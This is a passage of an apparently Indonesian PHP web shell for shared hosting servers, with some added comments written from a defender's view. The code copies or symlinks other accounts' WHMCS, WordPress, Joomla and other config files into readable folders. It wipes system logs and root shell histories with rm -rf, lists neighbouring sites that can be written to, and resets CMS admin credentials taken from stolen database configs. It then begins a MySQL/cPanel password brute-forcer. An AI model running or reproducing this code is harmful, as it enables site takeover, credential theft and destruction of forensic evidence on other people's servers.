  1139. "/home/$user_berandal/public_html/USER/submitticket.php" => "WHMCS",
  1140. "/home/$user_berandal/public_html/User/submitticket.php" => "WHMCS",
  1141. "/home/$user_berandal/public_html/user/submitticket.php" => "WHMCS",
  1142. "/home/$user_berandal/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1143. "/home/$user_berandal/public_html/Clients/submitticket.php" => "WHMCS",
  1144. "/home/$user_berandal/public_html/clients/submitticket.php" => "WHMCS",
  1145. "/home/$user_berandal/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1146. "/home/$user_berandal/public_html/Billings/submitticket.php" => "WHMCS",
  1147. "/home/$user_berandal/public_html/billings/submitticket.php" => "WHMCS",
  1148. "/home/$user_berandal/public_html/MY/submitticket.php" => "WHMCS",
  1149. "/home/$user_berandal/public_html/My/submitticket.php" => "WHMCS",
  1150. "/home/$user_berandal/public_html/my/submitticket.php" => "WHMCS",
  1151. "/home/$user_berandal/public_html/secure/whm/submitticket.php" => "WHMCS",
  1152. "/home/$user_berandal/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1153. "/home/$user_berandal/public_html/panel/submitticket.php" => "WHMCS",
  1154. "/home/$user_berandal/public_html/clientes/submitticket.php" => "WHMCS",
  1155. "/home/$user_berandal/public_html/cliente/submitticket.php" => "WHMCS",
  1156. "/home/$user_berandal/public_html/support/order/submitticket.php" => "WHMCS",
  1157. "/home/$user_berandal/public_html/bb-config.php" => "BoxBilling",
  1158. "/home/$user_berandal/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1159. "/home/$user_berandal/public_html/box/bb-config.php" => "BoxBilling",
  1160. "/home/$user_berandal/public_html/host/bb-config.php" => "BoxBilling",
  1161. "/home/$user_berandal/public_html/Host/bb-config.php" => "BoxBilling",
  1162. "/home/$user_berandal/public_html/supportes/bb-config.php" => "BoxBilling",
  1163. "/home/$user_berandal/public_html/support/bb-config.php" => "BoxBilling",
  1164. "/home/$user_berandal/public_html/hosting/bb-config.php" => "BoxBilling",
  1165. "/home/$user_berandal/public_html/cart/bb-config.php" => "BoxBilling",
  1166. "/home/$user_berandal/public_html/order/bb-config.php" => "BoxBilling",
  1167. "/home/$user_berandal/public_html/client/bb-config.php" => "BoxBilling",
  1168. "/home/$user_berandal/public_html/clients/bb-config.php" => "BoxBilling",
  1169. "/home/$user_berandal/public_html/cliente/bb-config.php" => "BoxBilling",
  1170. "/home/$user_berandal/public_html/clientes/bb-config.php" => "BoxBilling",
  1171. "/home/$user_berandal/public_html/billing/bb-config.php" => "BoxBilling",
  1172. "/home/$user_berandal/public_html/billings/bb-config.php" => "BoxBilling",
  1173. "/home/$user_berandal/public_html/my/bb-config.php" => "BoxBilling",
  1174. "/home/$user_berandal/public_html/secure/bb-config.php" => "BoxBilling",
  1175. "/home/$user_berandal/public_html/support/order/bb-config.php" => "BoxBilling",
  1176. "/home/$user_berandal/public_html/includes/dist-configure.php" => "Zencart",
  1177. "/home/$user_berandal/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1178. "/home/$user_berandal/public_html/products/includes/dist-configure.php" => "Zencart",
  1179. "/home/$user_berandal/public_html/cart/includes/dist-configure.php" => "Zencart",
  1180. "/home/$user_berandal/public_html/shop/includes/dist-configure.php" => "Zencart",
  1181. "/home/$user_berandal/public_html/includes/iso4217.php" => "Hostbills",
  1182. "/home/$user_berandal/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1183. "/home/$user_berandal/public_html/host/includes/iso4217.php" => "Hostbills",
  1184. "/home/$user_berandal/public_html/Host/includes/iso4217.php" => "Hostbills",
  1185. "/home/$user_berandal/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1186. "/home/$user_berandal/public_html/support/includes/iso4217.php" => "Hostbills",
  1187. "/home/$user_berandal/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1188. "/home/$user_berandal/public_html/cart/includes/iso4217.php" => "Hostbills",
  1189. "/home/$user_berandal/public_html/order/includes/iso4217.php" => "Hostbills",
  1190. "/home/$user_berandal/public_html/client/includes/iso4217.php" => "Hostbills",
  1191. "/home/$user_berandal/public_html/clients/includes/iso4217.php" => "Hostbills",
  1192. "/home/$user_berandal/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1193. "/home/$user_berandal/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1194. "/home/$user_berandal/public_html/billing/includes/iso4217.php" => "Hostbills",
  1195. "/home/$user_berandal/public_html/billings/includes/iso4217.php" => "Hostbills",
  1196. "/home/$user_berandal/public_html/my/includes/iso4217.php" => "Hostbills",
  1197. "/home/$user_berandal/public_html/secure/includes/iso4217.php" => "Hostbills",
  1198. "/home/$user_berandal/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1199. );
  1200.  
  1201. foreach($grab_config as $config => $nama_config) {
  // Runs once per candidate path for the current account ($user_berandal, set by the
  // enclosing loop). $config is the path, $nama_config the application label.
  // Defender notes: every file this loop produces is named <account>-<label>.txt
  // (plus a <account>-<label>.txt404 directory in mode 404), which makes the output
  // easy to find with a file-name search under the web root.
  // Mode grab: read the file and, when it is not empty, copy it into the output directory.
  1202. if($_POST['config'] == 'grab') {
  // file_get_contents() returns false for an unreadable path; the loose comparison
  // with '' below treats that the same as an empty file.
  1203. $ambil_config = file_get_contents($config);
  1204. if($ambil_config == '') {
  1205. } else {
  1206. $file_config = fopen("berandal_config/$user_berandal-$nama_config.txt","w");
  1207. fputs($file_config,$ambil_config);
  1208. }
  1209. }
  // Mode symlink: link the candidate path under a .txt name; failures are silenced by @.
  1210. if($_POST['config'] == 'symlink') {
  1211. @symlink($config,"berandal_Symconfig/".$user_berandal."-".$nama_config.".txt");
  1212. }
  // Mode 404: link the candidate path, and when symlink() reports success also create
  // a <name>.txt404 directory holding its own .htaccess and a second link.
  1213. if($_POST['config'] == '404') {
  1214. $sym404=symlink($config,"berandal_sym404/".$user_berandal."-".$nama_config.".txt");
  1215. if($sym404){
  1216. @mkdir("ManaKuTau_sym404/".$user_berandal."-".$nama_config.".txt404", 0777);
  1217. $htaccess="Options Indexes FollowSymLinks
  1218. DirectoryIndex 69.htm
  1219. HeaderName ManaKuTau.txt
  1220. Satisfy Any
  1221. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1222. IndexIgnore *";
  1223.  
  1224. @file_put_contents("ManaKuTau_sym404/".$user_berandal."-".$nama_config.".txt404/.htaccess",$htaccess);
  1225.  
  1226. @symlink($config,"ManaKuTau_sym404/".$user_ManaKuTau."-".$nama_config.".txt404/ManaKuTau.txt");
  1227.  
  1228. }
  1229.  
  1230. }
  1231.  
  1232. }
  // The brace on the next line closes the per-account loop; what follows prints links
  // to the output location of the selected mode. $dir is set outside this excerpt.
  1233. } if($_POST['config'] == 'grab') {
  1234. echo "<center><a href='?dir=$dir/berandal_config'><font color=cyan>Done</font></a></center>";
  1235. }
  1236. if($_POST['config'] == '404') {
  1237. echo "<center>
  1238. <a href=\"ManaKuTau_sym404/root/\">SymlinkNya</a>
  1239. <br><a href=\"berandal_sym404/\">Configurations</a></center>";
  1240. }
  1241. if($_POST['config'] == 'symlink') {
  1242. echo "<center>
  1243. <a href=\"berandal_symconfig/root/\">Symlinknya</a>
  1244. <br><a href=\"berandal_symconfig/\">Configurations</a></center>";
  1245. }if($_POST['config'] == 'symvhost') {
  1246. echo "<center>
  1247. <a href=\"berandal_symvhost/root/\">Root Server</a>
  1248. <br><a href=\"ManaKuTau_symvhost/\">Configurations</a></center>";
  1249. }
  1250.  
  1251.  
  // No POST body: show the input form. The textarea is pre-filled with the server's
  // own account list and the select offers the four modes handled above.
  1252. }else{
  1253. echo "<form method=\"post\" action=\"\"><center>
  1254. </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  // NOTE(review): include() is used on a non-PHP file here; presumably the file text is
  // emitted as literal output and echo then prints include's return value - confirm.
  1255. echo include("/etc/passwd");
  1256. echo "</textarea><br><br>
  1257. <select class=\"select\" name=\"config\" style=\"width: 450px;\" height=\"10\">
  1258. <option value=\"grab\">Config Grab</option>
  1259. <option value=\"symlink\">Symlink Config</option>
  1260. <option value=\"404\">Config 404</option>
  1261. <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
  1262. }
  1263. } elseif($_GET['delete'] == 'logs') {
  // Web-shell module selected by delete=logs: anti-forensics. It issues "rm -rf" for a
  // fixed list of shell-history files, login records (utmp, wtmp, lastlog) and log
  // directories, once through each of exec(), shell_exec(), passthru() and system() -
  // presumably so the deletion still runs when some of those functions are disabled.
  // Defender notes: whether anything is removed depends on the privileges of the PHP
  // process; on a typical setup the web server account cannot write under /root or
  // /var/log - TODO confirm per host. Logs forwarded to another machine are out of reach
  // of this branch, and a sudden gap in local logs or a missing wtmp/lastlog is itself
  // a signal. The delete=logs query string is a usable match in access logs that were
  // shipped off-host, and listing these four functions in disable_functions stops
  // every call in this branch.
  1264. echo '<br><center><h2>Delete Logs ( For Safe )</h2><center><br>';
  1265. echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'><br><hr color='white'>";
  // Pass 1: exec(). Return values and exit codes are ignored in every pass.
  1266. exec("rm -rf /tmp/logs");
  1267. exec("rm -rf /root/.ksh_history");
  1268. exec("rm -rf /root/.bash_history");
  1269. exec("rm -rf /root/.bash_logout");
  1270. exec("rm -rf /usr/local/apache/logs");
  1271. exec("rm -rf /usr/local/apache/log");
  1272. exec("rm -rf /var/apache/logs");
  1273. exec("rm -rf /var/apache/log");
  1274. exec("rm -rf /var/run/utmp");
  1275. exec("rm -rf /var/logs");
  1276. exec("rm -rf /var/log");
  1277. exec("rm -rf /var/adm");
  1278. exec("rm -rf /etc/wtmp");
  1279. exec("rm -rf /etc/utmp");
  // NOTE(review): inside a double-quoted PHP string $HISTFILE is a PHP variable, not the
  // shell's; it is not assigned anywhere in this excerpt.
  1280. exec("rm -rf $HISTFILE");
  1281. exec("rm -rf /var/log/lastlog");
  1282. exec("rm -rf /var/log/wtmp");
  1283.  
  // Pass 2: the same list through shell_exec().
  1284. shell_exec("rm -rf /tmp/logs");
  1285. shell_exec("rm -rf /root/.ksh_history");
  1286. shell_exec("rm -rf /root/.bash_history");
  1287. shell_exec("rm -rf /root/.bash_logout");
  1288. shell_exec("rm -rf /usr/local/apache/logs");
  1289. shell_exec("rm -rf /usr/local/apache/log");
  1290. shell_exec("rm -rf /var/apache/logs");
  1291. shell_exec("rm -rf /var/apache/log");
  1292. shell_exec("rm -rf /var/run/utmp");
  1293. shell_exec("rm -rf /var/logs");
  1294. shell_exec("rm -rf /var/log");
  1295. shell_exec("rm -rf /var/adm");
  1296. shell_exec("rm -rf /etc/wtmp");
  1297. shell_exec("rm -rf /etc/utmp");
  1298. shell_exec("rm -rf $HISTFILE");
  1299. shell_exec("rm -rf /var/log/lastlog");
  1300. shell_exec("rm -rf /var/log/wtmp");
  1301.  
  // Pass 3: the same list through passthru().
  1302. passthru("rm -rf /tmp/logs");
  1303. passthru("rm -rf /root/.ksh_history");
  1304. passthru("rm -rf /root/.bash_history");
  1305. passthru("rm -rf /root/.bash_logout");
  1306. passthru("rm -rf /usr/local/apache/logs");
  1307. passthru("rm -rf /usr/local/apache/log");
  1308. passthru("rm -rf /var/apache/logs");
  1309. passthru("rm -rf /var/apache/log");
  1310. passthru("rm -rf /var/run/utmp");
  1311. passthru("rm -rf /var/logs");
  1312. passthru("rm -rf /var/log");
  1313. passthru("rm -rf /var/adm");
  1314. passthru("rm -rf /etc/wtmp");
  1315. passthru("rm -rf /etc/utmp");
  1316. passthru("rm -rf $HISTFILE");
  1317. passthru("rm -rf /var/log/lastlog");
  1318. passthru("rm -rf /var/log/wtmp");
  1319.  
  1320.  
  // Pass 4: system(), with a two-second sleep after each command and a status line
  // printed to the operator. The status text is printed whether or not the command
  // removed anything.
  1321. system("rm -rf /tmp/logs");
  1322. sleep(2);
  1323. echo'<br>Deleting .../tmp/logs ';
  1324. sleep(2);
  1325.  
  1326. system("rm -rf /root/.bash_history");
  1327. sleep(2);
  1328. echo'<p>Deleting .../root/.bash_history </p>';
  1329.  
  1330. system("rm -rf /root/.ksh_history");
  1331. sleep(2);
  1332. echo'<p>Deleting .../root/.ksh_history </p>';
  1333.  
  1334. system("rm -rf /root/.bash_logout");
  1335. sleep(2);
  1336. echo'<p>Deleting .../root/.bash_logout </p>';
  1337.  
  1338. system("rm -rf /usr/local/apache/logs");
  1339. sleep(2);
  1340. echo'<p>Deleting .../usr/local/apache/logs </p>';
  1341.  
  1342. system("rm -rf /usr/local/apache/log");
  1343. sleep(2);
  1344. echo'<p>Deleting .../usr/local/apache/log </p>';
  1345.  
  1346. system("rm -rf /var/apache/logs");
  1347. sleep(2);
  1348. echo'<p>Deleting .../var/apache/logs </p>';
  1349.  
  1350. system("rm -rf /var/apache/log");
  1351. sleep(2);
  1352. echo'<p>Deleting .../var/apache/log </p>';
  1353.  
  1354. system("rm -rf /var/run/utmp");
  1355. sleep(2);
  1356. echo'<p>Deleting .../var/run/utmp </p>';
  1357.  
  1358. system("rm -rf /var/logs");
  1359. sleep(2);
  1360. echo'<p>Deleting .../var/logs </p>';
  1361.  
  1362. system("rm -rf /var/log");
  1363. sleep(2);
  1364. echo'<p>Deleting .../var/log </p>';
  1365.  
  1366. system("rm -rf /var/adm");
  1367. sleep(2);
  1368. echo'<p>Deleting .../var/adm </p>';
  1369.  
  1370. system("rm -rf /etc/wtmp");
  1371. sleep(2);
  1372. echo'<p>Deleting .../etc/wtmp </p>';
  1373.  
  1374. system("rm -rf /etc/utmp");
  1375. sleep(2);
  1376. echo'<p>Deleting .../etc/utmp </p>';
  1377.  
  1378. system("rm -rf $HISTFILE");
  1379. sleep(2);
  // Single-quoted string: the text "$HISTFILE" is printed literally here.
  1380. echo'<p>Deleting ...$HISTFILE </p>';
  1381.  
  1382. system("rm -rf /var/log/lastlog");
  1383. sleep(2);
  1384. echo'<p>Deleting .../var/log/lastlog </p>';
  1385.  
  1386. system("rm -rf /var/log/wtmp");
  1387. sleep(2);
  1388. echo'<p>Deleting .../var/log/wtmp </p>';
  1389.  
  1390. sleep(4);
  1391.  
  // The closing message is unconditional; no result of the commands above is checked.
  1392. echo '<hr color="white"><br><br><p>Your Traces Has Been Successfully Deleted ... From the Server';
  1393. echo"</td></tr></table>";
  1394. } elseif($_GET['do'] == 'jumping') {
  1395. $i = 0;
  1396. echo "<div class='margin: 5px auto;'>";
  1397. if(preg_match("/hsphere/", $dir)) {
  1398. $urls = explode("\r\n", $_POST['url']);
  1399. if(isset($_POST['jump'])) {
  1400. echo "<pre>";
  1401. foreach($urls as $url) {
  1402. $url = str_replace(array("http://","www."), "", strtolower($url));
  1403. $etc = "/etc/passwd";
  1404. $f = fopen($etc,"r");
  1405. while($gets = fgets($f)) {
  1406. $pecah = explode(":", $gets);
  1407. $user = $pecah[0];
  1408. $dir_user = "/hsphere/local/home/$user";
  1409. if(is_dir($dir_user) === true) {
  1410. $url_user = $dir_user."/".$url;
  1411. if(is_readable($url_user)) {
  1412. $i++;
  1413. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1414. if(is_writable($url_user)) {
  1415. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1416. }
  1417. echo $jrw."<br>";
  1418. }
  1419. }
  1420. }
  1421. }
  1422. if($i == 0) {
  1423. } else {
  1424. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1425. }
  1426. echo "</pre>";
  1427. } else {
  1428. echo '<center>
  1429. <form method="post">
  1430. List Domains: <br>
  1431. <textarea name="url" style="width: 500px; height: 250px;">';
  1432. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1433. while($getss = fgets($fp)) {
  1434. echo $getss;
  1435. }
  1436. echo '</textarea><br>
  1437. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1438. </form></center>';
  1439. }
  1440. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  1441. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  1442. $urls = explode("\r\n", $_POST['url']);
  1443. if(isset($_POST['jump'])) {
  1444. echo "<pre>";
  1445. foreach($urls as $url) {
  1446. $url = str_replace("www.", "", $url);
  1447. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  1448. if(is_dir($web_vh) === true) {
  1449. if(is_readable($web_vh)) {
  1450. $i++;
  1451. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1452. if(is_writable($web_vh)) {
  1453. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1454. }
  1455. echo $jrw."<br>";
  1456. }
  1457. }
  1458. }
  1459. if($i == 0) {
  1460. } else {
  1461. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1462. }
  1463. echo "</pre>";
  1464. } else {
  1465. echo '<center>
  1466. <form method="post">
  1467. List Domains: <br>
  1468. <textarea name="url" style="width: 500px; height: 250px;">';
  1469. bing("ip:$ip");
  1470. echo '</textarea><br>
  1471. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1472. </form></center>';
  1473. }
  1474. } else {
  1475. echo "<pre>";
  1476. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1477. while($passwd = fgets($etc)) {
  1478. if($passwd == '' || !$etc) {
  1479. echo "<font color=red>Can't read /etc/passwd</font>";
  1480. } else {
  1481. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1482. foreach($user_jumping[1] as $user_berandal_jump) {
  1483. $user_jumping_dir = "/home/$user_berandal_jump/public_html";
  1484. if(is_readable($user_jumping_dir)) {
  1485. $i++;
  1486. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1487. if(is_writable($user_jumping_dir)) {
  1488. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1489. }
  1490. echo $jrw;
  1491. if(function_exists('posix_getpwuid')) {
  1492. $domain_jump = file_get_contents("/etc/named.conf");
  1493. if($domain_jump == '') {
  1494. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1495. } else {
  1496. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1497. foreach($domains_jump[1] as $dj) {
  1498. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1499. $user_jumping_url = $user_jumping_url['name'];
  1500. if($user_jumping_url == $user_berandal_jump) {
  1501. echo " => ( <u>$dj</u> )<br>";
  1502. break;
  1503. }
  1504. }
  1505. }
  1506. } else {
  1507. echo "<br>";
  1508. }
  1509. }
  1510. }
  1511. }
  1512. }
  1513. if($i == 0) {
  1514. } else {
  1515. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1516. }
  1517. echo "</pre>";
  1518. }
  1519. echo "</div>";
  1520. } elseif($_GET['do'] == 'auto_edit_user') {
  1521. if($_POST['hajar']) {
  1522. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1523. echo "username atau password harus lebih dari 6 karakter";
  1524. } else {
  1525. $user_baru = $_POST['user_baru'];
  1526. $pass_baru = md5($_POST['pass_baru']);
  1527. $conf = $_POST['config_dir'];
  1528. $scan_conf = scandir($conf);
  1529. foreach($scan_conf as $file_conf) {
  1530. if(!is_file("$conf/$file_conf")) continue;
  1531. $config = file_get_contents("$conf/$file_conf");
  1532. if(preg_match("/JConfig|joomla/",$config)) {
  1533. $dbhost = ambilkata($config,"host = '","'");
  1534. $dbuser = ambilkata($config,"user = '","'");
  1535. $dbpass = ambilkata($config,"password = '","'");
  1536. $dbname = ambilkata($config,"db = '","'");
  1537. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1538. $prefix = $dbprefix."users";
  1539. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1540. $db = mysql_select_db($dbname);
  1541. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1542. $result = mysql_fetch_array($q);
  1543. $id = $result['id'];
  1544. $site = ambilkata($config,"sitename = '","'");
  1545. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1546. echo "Config => ".$file_conf."<br>";
  1547. echo "CMS => Joomla<br>";
  1548. if($site == '') {
  1549. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1550. } else {
  1551. echo "Sitename => $site<br>";
  1552. }
  1553. if(!$update OR !$conn OR !$db) {
  1554. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1555. } else {
  1556. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1557. }
  1558. mysql_close($conn);
  1559. } elseif(preg_match("/WordPress/",$config)) {
  1560. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1561. $dbuser = ambilkata($config,"DB_USER', '","'");
  1562. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1563. $dbname = ambilkata($config,"DB_NAME', '","'");
  1564. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1565. $prefix = $dbprefix."users";
  1566. $option = $dbprefix."options";
  1567. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1568. $db = mysql_select_db($dbname);
  1569. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1570. $result = mysql_fetch_array($q);
  1571. $id = $result[ID];
  1572. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1573. $result2 = mysql_fetch_array($q2);
  1574. $target = $result2[option_value];
  1575. if($target == '') {
  1576. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1577. } else {
  1578. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1579. }
  1580. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1581. echo "Config => ".$file_conf."<br>";
  1582. echo "CMS => Wordpress<br>";
  1583. echo $url_target;
  1584. if(!$update OR !$conn OR !$db) {
  1585. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1586. } else {
  1587. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1588. }
  1589. mysql_close($conn);
  1590. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1591. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1592. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1593. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1594. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1595. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1596. $prefix = $dbprefix."admin_user";
  1597. $option = $dbprefix."core_config_data";
  1598. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1599. $db = mysql_select_db($dbname);
  1600. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1601. $result = mysql_fetch_array($q);
  1602. $id = $result[user_id];
  1603. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1604. $result2 = mysql_fetch_array($q2);
  1605. $target = $result2[value];
  1606. if($target == '') {
  1607. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1608. } else {
  1609. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1610. }
  1611. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1612. echo "Config => ".$file_conf."<br>";
  1613. echo "CMS => Magento<br>";
  1614. echo $url_target;
  1615. if(!$update OR !$conn OR !$db) {
  1616. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1617. } else {
  1618. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1619. }
  1620. mysql_close($conn);
  1621. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1622. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1623. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1624. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1625. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1626. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1627. $prefix = $dbprefix."user";
  1628. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1629. $db = mysql_select_db($dbname);
  1630. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1631. $result = mysql_fetch_array($q);
  1632. $id = $result[user_id];
  1633. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1634. if($target == '') {
  1635. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1636. } else {
  1637. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1638. }
  1639. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1640. echo "Config => ".$file_conf."<br>";
  1641. echo "CMS => OpenCart<br>";
  1642. echo $url_target;
  1643. if(!$update OR !$conn OR !$db) {
  1644. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1645. } else {
  1646. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1647. }
  1648. mysql_close($conn);
  1649. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1650. $dbhost = ambilkata($config,'server = "','"');
  1651. $dbuser = ambilkata($config,'username = "','"');
  1652. $dbpass = ambilkata($config,'password = "','"');
  1653. $dbname = ambilkata($config,'database = "','"');
  1654. $prefix = "users";
  1655. $option = "identitas";
  1656. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1657. $db = mysql_select_db($dbname);
  1658. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1659. $result = mysql_fetch_array($q);
  1660. $target = $result[alamat_website];
  1661. if($target == '') {
  1662. $target2 = $result[url];
  1663. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1664. if($target2 == '') {
  1665. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1666. } else {
  1667. $cek_login3 = file_get_contents("$target2/adminweb/");
  1668. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1669. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1670. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1671. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1672. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1673. } else {
  1674. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1675. }
  1676. }
  1677. } else {
  1678. $cek_login = file_get_contents("$target/adminweb/");
  1679. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1680. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1681. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1682. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1683. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1684. } else {
  1685. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1686. }
  1687. }
  1688. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1689. echo "Config => ".$file_conf."<br>";
  1690. echo "CMS => Lokomedia<br>";
  1691. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1692. echo $url_target2;
  1693. } else {
  1694. echo $url_target;
  1695. }
  1696. if(!$update OR !$conn OR !$db) {
  1697. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1698. } else {
  1699. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1700. }
  1701. mysql_close($conn);
  1702. }
  1703. }
  1704. }
  1705. } else {
  1706. echo "<center>
  1707. <h1>Auto Edit User Config</h1>
  1708. <form method='post'>
  1709. DIR Config: <br>
  1710. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1711. Set User & Pass: <br>
  1712. <input type='text' name='user_baru' value='berandal' placeholder='user_baru'><br>
  1713. <input type='text' name='pass_baru' value='berandal' placeholder='pass_baru'><br>
  1714. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1715. </form>
  1716. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1717. ";
  1718. }
  1719. } elseif($_GET['do'] == 'cpanel') {
  1720. if($_POST['crack']) {
  1721. $usercp = explode("\r\n", $_POST['user_cp']);
  1722. $passcp = explode("\r\n", $_POST['pass_cp']);
  1723. $i = 0;
  1724. foreach($usercp as $ucp) {
  1725. foreach($passcp as $pcp) {
  1726. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1727. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1728. } else {
  1729. $_SESSION[$ucp] = "1";
